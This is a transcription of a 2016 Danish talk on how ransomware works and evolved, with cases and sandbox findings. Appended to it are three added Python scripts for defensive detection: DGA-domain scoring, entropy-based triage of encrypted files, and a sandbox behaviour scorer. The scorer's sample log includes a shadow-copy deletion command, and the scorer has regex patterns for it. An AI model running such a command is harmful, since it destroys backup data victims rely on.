IDA-IT-2016-02-09-3 Jacob Herbst

Transcription

Today's threat landscape –
Ransomware – how do they do it?
Jacob Herbst, CTO, Dubex A/S
IDA-IT after-work meeting, 9 February 2016
Dubex A/S
Highly specialised IT security experts
Managing risk – Enabling growth
Sought-after workplace
Motivated employees
Self-financing and privately owned since 1997
Quality
Service
Competence
First mover
Consulting and security services, locally and globally
Largest IT security partner in Denmark
16th best workplace in Denmark
5th best IT workplace in Denmark
What should we get out of this talk?
• My goals for this talk are to answer the following:
• What are the trends and tendencies in ransomware attacks?
• What drives the attacks we are seeing?
• A look at some of the methods the hackers use
• What can we do?
• Disclaimer: Security is a very large subject area that is constantly changing. In the next 35 minutes we will at most scratch a little of the surface.
Agenda
What are the trends and drivers?
How has ransomware evolved?
How does a ransomware attack work?
What is the Dark Web, and what can be found there?
What are the prospects for the future?
What can we do?
Attacks - current status
Targets
Methods
• Targeted attacks after confidential information
• Industrial espionage
• Attacks that bypass the perimeter defence
• Financially motivated crime
• Theft of credit card information
• Internet fraud
• Extortion – Ransomware and DDoS
Attackers
Espionage
Competitors
Terrorism
Political
Criminals
Cyber war
Internal
Attacks
• Attacks against users
• Social engineering attacks, e.g. phishing
• Attacks via social networks
• Web-based attacks
• Indirect attacks aimed at clients
• Indirect attacks via trusted external third parties
• Attacks hidden in encrypted SSL communication
• Vulnerabilities and advanced zero-day attacks
• Rapid exploitation of vulnerabilities
• Exploitation of unknown vulnerabilities – zero-day
• Unique and targeted malware
Drivers behind cybercrime
Automation
Collaboration and knowledge sharing
Anonymity
Profit
Payment infrastructure
Advanced attacks have become the norm
How Industrial Hackers Monetize the Opportunity
• Many targeted attacks are still relatively simple -- most so-called advanced attacks still start with an e-mail sent to the right person with the right content
• Cybercrime is a lucrative business, and it is easy to get started
• An underground community where the criminals trade in information
• Methods that were previously used only in targeted attacks are now used by ordinary criminals
• Malware has become more advanced
Source: RSA/CNBC
Social Security: $1
DDOS as a Service: ~$7/hour
Credit Card Data: $0.25-$60
Medical Record: >$50
Bank Account Info: >$1000 (depending on account type and balance)
Mobile Malware: $150
Spam: $50/500K emails
Exploits: $1000-$300K
Malware Development: $2500
Facebook Account with 15 friends: $1
Malware - Development process
Malware is widespread and can be produced so that it bypasses the traditional perimeter defence and other protection
Obfuscation and quality testing
Original malware
Permutations
Quality testing
Rejected if detected by anti-virus software
• Many different variants of the same malware are produced automatically ahead of an attack
• Only variants that pass the quality testing (= bypass antivirus) are used in the actual attack
• New variants are released at regular intervals to stay constantly ahead of the antivirus signature updates
13,750 new malware files per hour
Deployment
Malware is unique
YOU’RE ABSOLUTELY UNIQUE
— JUST LIKE EVERYONE ELSE
• “Consistent with some other recent vendor reports, we
found that 70 to 90% (depending on the source and
organization) of malware samples are unique to a single
organization.”
• “There’s another lesson here worth stating: Receiving a
never-before-seen piece of malware doesn’t mean it was
an “advanced” or “targeted” attack. It’s kinda cool to think
they handcrafted a highly custom program just for you, but
it’s just not true. Get over it and get ready for it. Special
snowflakes fall on every backyard.”
• “A quick look at the types of malware being used shows they are overwhelmingly opportunistic and relatively short-lived. Even though we looked at data over just a six-month period, 95% of the malware types showed up for less than a month, while four out of five didn’t last beyond a week.”
Ransomware cases
Incidents - Denmark
Human error may be the cause of cyberattacks against municipalities
Attacks like the one that hit Gribskov municipality are most often due to human error, but Denmark may be in the crosshairs right now, an expert believes.
By Mads Allingstrup / 22 Jan 2015, 12:27
Municipalities exposed to hacker attacks and extortion
By Jens Beck Nielsen and Henrik Jensen
22 January 2015, 22:30
Several municipalities have now, for the first time, been attacked by hackers who demand money to back off.
Heavy activity on Gribskov Municipality's drives revealed on Monday afternoon that the municipality had, for the first time, been hit by a cyberattack. Hackers had encrypted files in the municipality's systems and demanded money to give up control of them. The municipality refused to pay and reported the case to the police, who yesterday passed it on to Europol. So far there is nothing to suggest that sensitive information about citizens has leaked, but chief executive Holger Spangsberg Kristiansen stresses that the attack is being taken »very, very seriously.«
Two municipalities have been hit, but there are most likely more that are not yet known, explains Mads Nørgaard Madsen, security expert and partner at the audit firm PWC, who has been in contact with the affected municipalities.
According to Mads Nørgaard Madsen, the hackers fire with a shotgun and encrypt arbitrary files. And according to him there is therefore no question of targeted attempts to steal, for example, sensitive personal data. »This is about causing as much havoc as possible so that as much money as possible can be demanded. In this case the hackers approached via e-mail, and some users happened to download an infected file. So it is also about raising awareness of security. Without pointing fingers, that might have countered these attacks,« says Mads Nørgaard Madsen.
Malicious postal virus attacks Danish companies
While Gribskov, Nordfyns and perhaps even more municipalities are right now struggling to free themselves from a vile attack on their IT systems, there are probably one or more employees in the municipalities walking around with red ears.
Ransomware attacks are most often due to human error, where people happen to download a file they should not have downloaded, or click on a link or an attachment in an e-mail that turns out to be infected.
That is the assessment of the director of the security organisation DK-Cert, Shehzad Ahmad, who as recently as last week was behind a report on the IT security of Danes, in which ransomware was specifically mentioned as a growing problem.
Often attachments
- One cannot rule out that this is a targeted attack, but what we normally see is that it is a human who starts the process themselves. It could be a person in an accounting department who clicked on a statement they were sent, or a person who clicked on a link in an e-mail.
Ransomware is one of the vilest types of attack, because the malicious code actively tries to 'hijack' the user's computer and demands a ransom to release it again. The extra-advanced types of ransomware even encrypt the user's files, or certain file types such as Excel sheets, with very strong encryption that cannot easily be broken.
The perpetrators then demand a ransom to unlock the computer - but even if you pay, it is far from always the case that they actually keep their promise and send the key so that the files can be freed.
http://www.dr.dk/nyheder/viden/tech/menneskelig-fejlkan-vaere-aarsag-til-cyberangreb-mod-kommuner
Monday 28 September 2015, 12:20 / Thomas Breinstrup
PostDanmark has reported to the police a virus that pretends to come from the postal service but locks people's files and demands a ransom.
A particularly malicious computer virus, which pretends to come from the postal service, is spreading in Denmark and encodes files so that one no longer has access to them.
http://www.b.dk/nationalt/kommuner-udsat-for-hackerangreb-og-afpresning
PostDanmark warns on its front page against the fake message, which many Danes have received and which contains a dangerous virus.
Cases in the media
Ransomware
- Lack of patching led to ransomware
- Three months after the hacker attack there are still after-effects of the digital break-in and extra work in the bookkeeping department.
- The ransom was around DKK 3,000, which was fairly low, but the communication with the hackers dragged on. They ended up pulling the plug on the whole old IT setup instead.
- Now it is therefore also about preparing for new threats.
- »You don't think it will happen to you. But don't believe it won't happen to you. It is no longer a question of who gets hacked, but when.«
Cases in the media
Targeted
Abroad…
“Between April 2014 and June 2015, the IC3
received 992 CryptoWall-related complaints, with
victims reporting losses totaling over $18 million.”
– FBI Security Bulletin, June 2015
Ransomware Evolution
• Clearly, ransomware attacks have increased in numbers over the last 5 years
• Many security reports talk about the sophistication and complexity of individual attacks
• The general public is left with the impression that we are faced with a new threat that is very difficult or
impossible to prevent
The evolution of ransomware – a bit of history
Cyber extortion
• Cyber extortion is online crime that involves an attack, or the threat of an attack, against a person or company, combined with a demand for payment to stop the attack
• Cyber extortion can take several forms: encrypting data and holding it hostage, stealing data and threatening to expose it, denying access to data, or attacking systems so that they become unavailable
Cyber extortion
DDoS
Volumetric: Flooding
Computational asymmetric: Consuming CPU cycles
Stateful asymmetric: Abusing memory
Vulnerability-based: Exploiting software vulnerabilities
Blended DDoS: Combination of multiple attack vectors
Ransomware
Encryption ransomware
Locker ransomware
Blackmail
Release information
Ransomware History - AIDS
• The first known ransomware was the 1989 "AIDS" trojan
(also known as "PC Cyborg") written by Joseph Popp.
• PC CYBORG (AIDS Disk)
• Emerged in 1989.
• Distributed on floppy disks
• Installed from Trojan software
• Lay dormant to allow time for propagation
• Used basic encryption and operating system quirks to “scramble” and hide files
• Demanded a “License Payment” to be sent via
cheque to a post office box in Panama
• Not very successful
• Technology was lagging behind the idea
Ransomware History – 1990s – 2000s
• Malware continued to develop 1990s – 2000s
• Identity theft
• Phishing scams, stealing passwords
• Bot Nets – Networks of compromised PCs
• Adware
• Ransomware 1990s-2000s
• Very small percent of Malware!
• Too complicated, how to get money?
• Too risky, how to stay hidden?
• Too weak, how to “Denial of Service” an uncontrolled PC?
(CC) BitDefender España (2010)
Source: https://www.flickr.com/photos/bitdefenderes/4292753852
• Occasional “fake” ransom, or Anti Virus, easily defeated / removed
• Occasional “locker” that affected boot process, easily defeated / removed
• 2005: PGPCoder Trojan – 1024-bit RSA key, collects money via EGOLD
Source: http://www.acma.gov.au/~/media/mediacomms/Social%20Media/Images/Ransomware%20Screenshot%20jpg.jpg
Ransomware History – 1990s – 2000s
• The ransomware concept dates back to 1989
• In 2010, something changed…
• In 2012, something changed, a lot!
• Technology has caught up to the idea!
• Step 1: Idea! Ransom money from people!
• Step 2: Use technology to enable the idea!
• Step 3: Profit…
• CTB-Locker stands for ‘Curve-Tor-Bitcoin’, a reference to its core technologies:
• Curve - Strong encryption, i.e. elliptic curve encryption, an extremely strong form of encryption based on number theory
• Tor - Anonymity via The Onion Router network, an anonymised part of the Dark Internet
• Bitcoin - Untraceable crypto-cash payments; the virtual currency extorted from victims of the ransomware (invented 2009 by Satoshi Nakamoto)
Google search trends: “ransomware” searches, 2008 to 2015
Malware types - 2005 - 2015
Figure: Percentage of new families of misleading apps, fake AV, locker ransomware and crypto ransomware identified between 2005 and 2015
Source: Symantec, The evolution of ransomware, August 2015
Reveton - Locker
• In 2012, a ransomware worm known as Reveton began to spread
• It is also known as the "police trojan"
• Its payload displays a warning from a law enforcement agency
• The warning claims that the computer has been used for illegal activities, such as downloading pirated software, promoting terrorism, copyright infringement, etc.
• The warning informs the user that to unlock their system they would have to pay a fine
• To increase the illusion that the computer is being tracked by law enforcement, the screen also displays the computer's IP address and footage from the computer's webcam
Lockers
What is crypto ransomware?
• Crypto ransomware takes your data hostage
• Crypto ransomware encrypts your data and offers to sell you the key for decryption
• Until about a year ago most crypto ransomware attacks were fairly harmless, as the encryption used could easily be removed
• With Cryptolocker, Torrentlocker, CTBLocker and the like, this has changed …
Course of the attack: infection; the malware downloads the crypto malware; data is encrypted; a message demands payment of the ransom before the deadline expires; payment of the ransom in Bitcoins via TOR
Evolution (examples)
Evolution of GPCode’s encryption
• GPCode (2004)
• Used a one-byte encryption key, easily defeated
• Electronic payments
• GPCode.ac (June 2005)
• Implemented RSA public key cryptography (PKI)
• Very weak key (56-bit RSA modulus = 7-bit symmetric key)
• GPCode.ad (April 2006)
• Longer RSA keys but still a poor PKI implementation
• GPCode.ag (June 2006)
• Finally, a strong RSA key (660 bit = ~60-bit symmetric)
• Cracked by Kaspersky, probably a coding error in .ag
• GPCode.ak (June 2008)
• Properly implemented 1024-bit RSA key
• Failed due to implementation of the wrong “cipher”
• RC4, vulnerable to cryptanalysis
• GPCode.ax (December 2010) – a copycat…
• Unbreakable encryption
• … but can still be stopped (it has flaws)
Evolution of Command and Control
• GPCode (2004)
• No C&C (C2) server, it just “did its thing”
• Contact the malware producer via e-mail for the unlock code
• Reveton (2012)
• Doesn’t encrypt but uses a C2 server for ‘unlock’
• Cryptolocker (2013)
• Uses a C2 server to retrieve the RSA public key (much more secure)
• Pseudo-random “Domain Generation Algorithm” (DGA) to avoid easy takedowns (contacts garbage URLs: xxgrradvvzcfyx.biz)
• Cryptowall (2014)
• Uses a C2 server on TOR – hidden and anonymous network!
• Improved DGA to make takedown even harder
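The DGA behaviour described for Cryptolocker above leaves a detectable trace in DNS logs: one client querying a burst of random-looking names while it searches for a live C2 domain. The following Python script is an added example, not code from the talk or from Dubex. It scores the registered label of each queried domain on character entropy, vowel ratio and consonant runs, and reports clients that exceed a hit count. The log format and every sample line are constructed for the example (the .biz domain is the one quoted on the slide); the thresholds are the example's own choices.

```python
import math
import re
from collections import Counter

# Constructed sample DNS log (not from the talk). Assumed format per line:
# "<timestamp> <client-ip> <queried-domain>". The .biz name is the garbage
# domain quoted on the CryptoLocker slide; the others are made up.
SAMPLE_DNS_LOG = """\
2016-02-09T10:01:12 10.0.0.15 www.dubex.dk
2016-02-09T10:01:13 10.0.0.15 update.microsoft.com
2016-02-09T10:01:15 10.0.0.22 xxgrradvvzcfyx.biz
2016-02-09T10:01:15 10.0.0.22 qpwzkjfhtrmvxn.org
2016-02-09T10:01:16 10.0.0.22 ryvtbkqzmxnpwl.net
2016-02-09T10:01:17 10.0.0.22 zxkqvwrmtplnbg.biz
2016-02-09T10:01:20 10.0.0.31 mail.google.com
2016-02-09T10:01:21 10.0.0.31 stackoverflow.com
"""

VOWELS = set("aeiou")

def shannon_entropy(s):
    """Bits of entropy per character of the string s."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def registered_label(domain):
    """Second-level label, e.g. 'xxgrradvvzcfyx' for 'xxgrradvvzcfyx.biz'."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def dga_score(domain):
    """Count how many DGA traits the registered label shows (0..3)."""
    label = registered_label(domain)
    if len(label) < 8:                      # short labels are too ambiguous to judge
        return 0
    score = 0
    if shannon_entropy(label) > 3.0:        # characters spread evenly, unlike real words
        score += 1
    if sum(ch in VOWELS for ch in label) / len(label) < 0.25:   # few vowels
        score += 1
    longest_run = max((len(m) for m in re.findall(r"[^aeiou0-9-]+", label)), default=0)
    if longest_run >= 4:                    # unpronounceable consonant clusters
        score += 1
    return score

def is_dga_like(domain, min_score=2):
    return dga_score(domain) >= min_score

def parse_dns_log(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            yield parts[0], parts[1], parts[2]

def find_dga_clients(text, min_hits=3):
    """Clients that queried at least min_hits DGA-looking domains: the lookup
    loop a C2 search produces, as opposed to a single odd name."""
    hits = Counter()
    for _ts, client, domain in parse_dns_log(text):
        if is_dga_like(domain):
            hits[client] += 1
    return {client: n for client, n in hits.items() if n >= min_hits}

if __name__ == "__main__":
    for client, n in find_dga_clients(SAMPLE_DNS_LOG).items():
        print(f"{client}: {n} DGA-like lookups")
```

The per-domain score deliberately needs two of three traits, so a single long but pronounceable brand name is not flagged; the per-client hit count is what separates a DGA loop from a one-off typo.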
Ransomware 2013/2014
September 2013: CryptoLocker - first versions appear to have been posted September 2013
• Usually enters the company by e-mail.
• If a user clicks on the executable, it immediately starts scanning network drives, renames all the files & folders and encrypts them.
December 2013: Locker – first copycat software emerged in December 2013
• $150 to get the key, with money being sent to a Perfect Money or QIWI Visa Virtual Card number.
December 2013: CryptoLocker 2.0 – a new and improved version of CryptoLocker was found in December 2013
• CryptoLocker 2.0 was written using C# while the original was in C++.
• Tor and Bitcoin used for anonymity, and 2048-bit encryption.
• The latest variant is not detected by anti-virus or firewall.
December 2013: CryptorBit – a new ransomware discovered in December 2013
• CryptorBit corrupts the first 1024 bytes of any data file it finds.
• Can bypass Group Policy settings put in place to defend against this type of ransomware infection.
• Social engineering used to get end users to install the ransomware using such devices as a fake flash update or a rogue antivirus product.
• Tor and Bitcoin again used for a ransom payment.
• Also installs crypto-coin mining software that uses the victim’s computer to mine digital currency.
April 2014: CryptoWall – rebranded from CryptoDefense in April 2014
• Exploited a Java vulnerability.
• Malicious advertisements on domains belonging to Disney, Facebook, The Guardian newspaper and many others led people to sites that were CryptoWall infected and encrypted their drives.
• According to an August 27 report from Dell SecureWorks Counter Threat Unit (CTU): “CTU researchers consider CryptoWall to be the largest and most destructive ransomware threat on the Internet as of this publication, and they expect this threat to continue growing.”
• More than 600,000 systems were infected between mid-March and August 24, with 5.25 billion files being encrypted. 1,683 victims (0.27%) paid a total $1,101,900 in ransom. Nearly 2/3 paid $500, but the amounts ranged from $200 to $10,000.
July 2014: Cryptoblocker – new ransomware variant emerged in July 2014
• Only encrypts files <100 MB and will skip anything in Windows or Program Files.
• It uses AES rather than RSA encryption.
August 2014: SynoLocker – appeared in August 2014
• This one attacked Synology NAS devices. SynoLocker encrypted files one by one.
• Payment was in Bitcoins and again Tor was used for anonymity.
Midsummer 2014: CTB-Locker (Curve-Tor-Bitcoin Locker) – discovered midsummer 2014
• First infections were mainly in Russia. The developers were thought to be from an eastern European country.
Ransomware 2014/2015
December 2014: OphionLocker – surprise! Another ransomware released during the holidays, December 2014
• ECC (elliptic curve cryptography) public-key encryption.
• 3 days to pay the ransom or the private key will be deleted.
January 2015: Pclock – greets the New Year, January 2015, by mimicking CryptoLocker
• Files in a user’s profile are encrypted.
• Volume shadow copies are deleted and disabled.
• 72-hour countdown timer to pay 1 bitcoin in ransom.
January 2015: CryptoWall 2.0 – ransomware goes on steroids in January 2015
• Delivered via email attachments, malicious pdf files and various exploit kits.
• Encrypts the user’s data until a ransom is paid for the decryption key.
• Uses TOR to obfuscate the C&C (Command & Control) channel.
• Incorporates anti-VM and anti-emulation checks to hamper identification via sandboxes.
• Has the ability to run 64-bit code directly from its 32-bit dropper. It can switch the processor execution context from 32-bit to 64-bit.
February 2015: TeslaCrypt – a new CryptoWall variant surfaced in February 2015
• Targets popular video game files such as Call of Duty, MineCraft, World of Warcraft, and Steam.
February 2015: VaultCrypt – pretended to be customer support in February 2015
• First circulated in Russia.
• Uses Windows batch files and the open source GnuPG privacy software for file encryption.
March 2015: CryptoWall 3.0 – a new version appeared March 2015
• I2P network communication.
• Uses exploit kits to gain privilege escalation on the system.
• Disables many security features on a target system.
September 2015: CryptoWall 4.0 - 6 months later, in September 2015, a new variant is on the loose
• The most important change from CryptoWall 3.0 to 4.0 is that it also encrypts the filenames of the encrypted files, making it more difficult to decipher which files need to be recovered (filename scrambling)
• Obliterates restore points
• Improved network security evasion
October 2015: LowLevel04 – this file-encrypting ransomware greeted us in October 2015
• Also known as the Onion TrojanRansom
• Spreads via brute force attacks on machines with Remote Desktop or Terminal Services
• Encrypts files using AES encryption, but the encryption key itself is RSA encrypted
November 2015: Chimera – November 2015
• The hackers will publish the encrypted files on the Internet if the victim doesn’t pay!
Ransomware attack
Typical course of a ransomware attack
Phishing attack: a number of users receive a phishing mail
Attack: the user opens the attached file or visits the link; the user's machine is infected with malware
Malware download & contact: the crypto ransomware is downloaded and the malware contacts the Command & Control server
Key exchange: exchange of public/private keys for the encryption
Encryption of data: the files on the affected computer are encrypted
Display of the extortion: the victim is shown a message with deadline and ransom
(Payment): the victim pays the ransom via the Tor network with Bitcoins
(Unlocking of files): the victim receives the key for decrypting the data
Cryptolocker
• Widely known variant of ransomware
• Distributed either as an attachment to a malicious e-mail, or propagated using the Gameover ZeuS botnet
• Began September 2013 / Rose to prominence in late 2013
• Encrypts certain types of files stored on local drives using RSA public-key cryptography
• The private key is stored only on the malware's control servers, and it is impossible to recover files without the key
• Offers to decrypt the data if a $300 ransom payment is made by a stated deadline. Ransom increases after deadline.
• Threatens to delete the private key if the deadline passes.
• Goal is monetary via Bitcoin
• Dell SecureWorks estimates that CryptoLocker has infected 250,000 victims. The average payout is $300 each; 1 million dollars a day.
• $27 million in ransom in first 2 months (FBI)
• Defeated in early June 2014 when the Gameover botnet was knocked out in a
joint effort by various government agencies and security firms
• Decryption keys available for victims at www.decryptcryptolocker.com
Filename and Extensions Encrypted
.3fr, .7z*, .ai*, .apk, .arw, .avi, .bar, .bay, .bc6, .bc7, .big, .bik, .bkf, .bkp, .bsa, .cas, .cdr, .cer, .cfr, .cr2
.crt, .crw, .css, .csv, .das, .db, .db*, .dcr, .der, .dmp, .dng, .doc, .docx, .dwg, .dxg, .epk, .eps, .erf, .esm, .ff, .ff*
.flv, .fos, .fpk, .fsh, .gdb, .gho, .hkx, .itl, .itm, .iwd, .iwi, .jpe, .jpg, .js, .js*, .kdb, .kdc, .kf, .kf*, .lbf, .lrf
.ltx, .lvl, .m2, .m2*, .m3u, .m4a, .map, .mdb, .mdf, .mef, .mlx, .mov, .mp4, .ncf, .nrw, .ntl, .odb, .odc, .odm, .odp
.ods, .odt, .orf, .p12, .p7b, .p7c, .pak, .pdd, .pdf, .pef, .pem, .pfx, .png, .ppt, .pptx, .psd, .psk, .pst, .ptx, .py, .py*
.qdf, .qic, .r3d, .raf, .rar, .raw, .rb, .rb*, .re4, .rim, .rtf, .rw2, .rwl, .sav, .sb, .sb*, .sid, .sie, .sis, .slm, .snx
.sql, .sr2, .srf, .srw, .sum, .svg, .t12, .t13, .tax, .tor, .txt, .upk, .vcf, .vdf, .vpk, .vtf, .w3x, .wb2, .wma, .wmo
.wmv, .wpd, .wps, .x3f, .xf, .xf8, .xlk, .xls, .xlsx, .xxx, .zip
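The extension list above is also what a defender can use for triage after an incident: which of the targeted files still carry their format header, and which have turned into near-random data. The script below is an added example, not code from the talk or from Dubex. It walks a directory tree and, for files whose extension is on the list, reports those whose first 4 KiB has no recognisable header and an entropy close to 8 bits per byte. Archives, Office documents, JPEGs and PDFs are compressed and therefore high-entropy even when intact, so the check looks for their magic bytes first; without that step every intact .zip and .docx would be a false positive. The sample directory it builds is constructed, and the extension subset and thresholds are the example's own choices.

```python
import hashlib
import math
import os
import tempfile
from collections import Counter

# Extensions CryptoLocker targeted, taken from the list on the slide (a subset
# is enough for the demonstration; the full list drops in unchanged).
TARGETED_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".jpg",
                       ".txt", ".zip", ".7z", ".rar", ".psd", ".dwg", ".csv"}

# Intact files in these formats are compressed and therefore high-entropy by
# design; their magic bytes identify them so they are not reported as encrypted.
KNOWN_HEADERS = (b"PK\x03\x04", b"7z\xbc\xaf\x27\x1c", b"Rar!\x1a\x07",
                 b"\xff\xd8\xff", b"%PDF", b"8BPS")

ENTROPY_THRESHOLD = 7.5      # bits per byte; ciphertext and random data sit near 8.0
SAMPLE_SIZE = 4096

def entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def looks_encrypted(path):
    """True when a targeted file has lost its format header and is near-random."""
    with open(path, "rb") as f:
        head = f.read(SAMPLE_SIZE)
    if any(head.startswith(magic) for magic in KNOWN_HEADERS):
        return False
    return entropy(head) > ENTROPY_THRESHOLD

def scan_tree(root):
    """Sorted relative paths (forward slashes) of targeted files that look encrypted."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in TARGETED_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            if looks_encrypted(path):
                findings.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(findings)

def pseudo_random_bytes(n, seed):
    """Deterministic high-entropy filler (SHA-256 in counter mode) for the demo files."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def build_demo_tree(root):
    """Constructed sample files: three intact, two encrypted-looking, one ignored."""
    docs = os.path.join(root, "docs")
    os.makedirs(docs, exist_ok=True)
    samples = {
        "notes.txt":   b"Quarterly notes: budget review on Monday, backups verified.\n" * 40,
        "report.docx": b"PK\x03\x04" + pseudo_random_bytes(3000, b"docx"),   # intact Office file
        "archive.zip": b"PK\x03\x04" + pseudo_random_bytes(3000, b"zip"),    # intact archive
        "budget.xlsx": pseudo_random_bytes(4096, b"enc1"),                   # header gone, random
        "photo.jpg":   pseudo_random_bytes(4096, b"enc2"),                   # header gone, random
        "readme.md":   pseudo_random_bytes(4096, b"enc3"),                   # not a targeted extension
    }
    for name, content in samples.items():
        with open(os.path.join(docs, name), "wb") as f:
            f.write(content)

def run_demo():
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan_tree(root)

if __name__ == "__main__":
    for path in run_demo():
        print("possibly encrypted:", path)
```

Run against a real share the output is a list of files to restore from backup rather than a verdict on the malware itself; a ransomware that keeps the original header or uses a weak scrambling scheme will slip past this check, which is why it complements, rather than replaces, the behavioural detection in a sandbox.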
TeslaCrypt
Who pays the ransom?
A police department paid to decrypt images and Word documents
In Australia, a Townsville sex shop paid $1,058 to ransomware attackers.
FBI’s Advice on Ransomware? Just Pay The Ransom.
“The ransomware is that good,”
“To be honest, we often advise people just to
pay the ransom.”
“The easiest thing may be to just pay the
ransom,”
“The amount of money made by these criminals
is enormous and that’s because the
overwhelming majority of institutions just pay
the ransom.”
“Most ransomware scammers are good to their word. You do get your access back.”
Joseph Bonavolonta, Assistant Special Agent in Charge of FBI’s CYBER and Counterintelligence Program, Boston
https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/
How many pay?
• It is surprising that approx. 9.7% of the respondents claim to have been victims of some sort of ransomware. This
figure is at least twice as high as the one we were expecting, judging from the scarce and quite speculative
previous literature. Most of the ransomware victims seemed to have chosen not to pay the ransom, but a very
high percentage of them indeed complied and sent the money to the cyber criminals. This percentage seems to
be around 41% for CryptoLocker and approx. 30% for other strands of ransomware (Icepol/Reveton, and many
others). This is at least 10 times more than the last previous estimation by Symantec of around a 3% of paying
victims (a previous one by the Dell SecureWorks CTU research team put this figure at 0.4%).
Data from a Jan 2014 survey by University of Kent
http://www.cybersec.kent.ac.uk/Survey2.pdf
Cryptolocker Mastermind
• According to the FBI, losses are “more than $100
million.”
• Bogachev is identified as a leader of a cyber gang of criminals based in Russia and Ukraine that is responsible for both GameOver Zeus and Cryptolocker.
• Evgeniy Mikhailovich Bogachev
• Age 30
• Anapa, Russia
• Nickname “Slavik”
• Indicted for conspiracy, computer hacking, wire
fraud, bank fraud, and money laundering
Image source: FBI
An attack…
Dubex Security Analytics Center
• Monitoring of log files and alarms from, among others:
• Firewalls
• IDS/IPS systems
• Web scanning
• Servers (Windows, Unix, databases, web servers, Active Directory, etc.)
• Some statistics from 2015:
• Processing of ”direct” data from over 10,000 devices – indirectly from many more via logs from firewalls, IDS/IPS, etc.
• Collection and analysis of more than 12 trillion log lines / events
• Manual review of more than 3.5 million correlated alarms
• Over 500 qualified alarms sent out to our customers
Typical observations
Internal systems with malware/trojan horses
Phishing attacks
Ransomware
Attacks against web servers – vulnerabilities, SQL injection, ransomware and defacement
Brute-force password cracking
Scanning for SIP services
Suspicious traffic
Unauthorised traffic
Other – scans
Current ransomware
Example of a phishing mail
• The end user receives a phishing mail with a link to a fake website
• The page is ”protected” with a CAPTCHA, presumably to protect against automatic analysis
File download
• The end user then automatically downloads a ZIP file called ”forsendelse_20310.zip”
• The file actually contains an EXE file which has been given a PDF logo to look like a PDF file
Sandbox analysis
• The sandbox is a monitored copy of our client environment in which malware can be run and observed without causing damage to the system itself
• The sandbox is used for dynamic malware analysis and behaviour-based detection
Analysis of the malicious file
Change of mail configuration
Autorun addition & obfuscation of the file
Copying to the %windir% directory
Unique, unknown file
Deletion of shadow copies
Access to ”malware” domain
Establishment of a backdoor
Lookups on its own DNS server
The virus only slowly becomes known to the antivirus software
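The observations listed above (an autorun entry, a copy into %windir%, deletion of shadow copies, contact with a known malware domain, DNS lookups sent to a server other than the configured resolver) are the raw material a sandbox turns into a verdict. The following Python script is an added example, not Dubex's sandbox or any product's code. It reads a constructed JSON-lines event log from a sandbox run, maps each event to a behaviour, weights the behaviours and produces a verdict; shadow-copy deletion carries the most weight because a freshly downloaded attachment has almost no legitimate reason to do it. The event schema, the resolver address and the domain blocklist are assumptions made for the example (the blocklisted name is the DGA domain quoted earlier on the page).

```python
import json
import re

# Constructed sandbox event log in JSON-lines form. The event schema is an
# assumption made for this example; it is not the output format of any
# particular sandbox product. The file name mirrors the ZIP on the slide.
SAMPLE_EVENTS = r"""
{"type": "process", "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\forsendelse_20310.exe", "cmdline": "forsendelse_20310.exe"}
{"type": "file_write", "path": "C:\\Windows\\svchosts.exe"}
{"type": "registry_set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "name": "svchosts", "data": "C:\\Windows\\svchosts.exe"}
{"type": "process", "image": "C:\\Windows\\System32\\vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"}
{"type": "dns", "query": "xxgrradvvzcfyx.biz", "server": "203.0.113.7"}
{"type": "network", "dst": "203.0.113.9", "port": 443}
"""

# Resolver the sandbox network is configured to use (constructed value).
EXPECTED_RESOLVERS = {"10.0.0.2"}
# Threat-intelligence blocklist (constructed; the entry is the garbage C2
# domain quoted on the CryptoLocker slide).
KNOWN_BAD_DOMAINS = {"xxgrradvvzcfyx.biz"}

SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)

# How strongly each behaviour points at ransomware.
WEIGHTS = {
    "shadow_copy_deletion": 5,
    "known_bad_domain": 4,
    "autorun_persistence": 2,
    "copy_to_windir": 2,
    "non_standard_dns_server": 2,
}

def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def classify_event(ev):
    """Return the set of behaviours one event demonstrates (possibly empty)."""
    found = set()
    kind = ev.get("type")
    if kind == "registry_set" and RUN_KEY.search(ev.get("key", "")):
        found.add("autorun_persistence")
    if kind == "file_write" and ev.get("path", "").lower().startswith("c:\\windows\\"):
        found.add("copy_to_windir")
    if kind == "process" and SHADOW_DELETE.search(ev.get("cmdline", "")):
        found.add("shadow_copy_deletion")
    if kind == "dns":
        if ev.get("server") not in EXPECTED_RESOLVERS:
            found.add("non_standard_dns_server")
        if ev.get("query", "").lower().rstrip(".") in KNOWN_BAD_DOMAINS:
            found.add("known_bad_domain")
    return found

def analyse(text):
    """Aggregate behaviours over the whole run and turn them into a verdict."""
    seen = set()
    for ev in parse_events(text):
        seen |= classify_event(ev)
    score = sum(WEIGHTS[b] for b in seen)
    if "shadow_copy_deletion" in seen and score >= 7:
        verdict = "ransomware-like"
    elif score >= 4:
        verdict = "suspicious"
    else:
        verdict = "no finding"
    return {"behaviours": sorted(seen), "score": score, "verdict": verdict}

if __name__ == "__main__":
    print(json.dumps(analyse(SAMPLE_EVENTS), indent=2))
```

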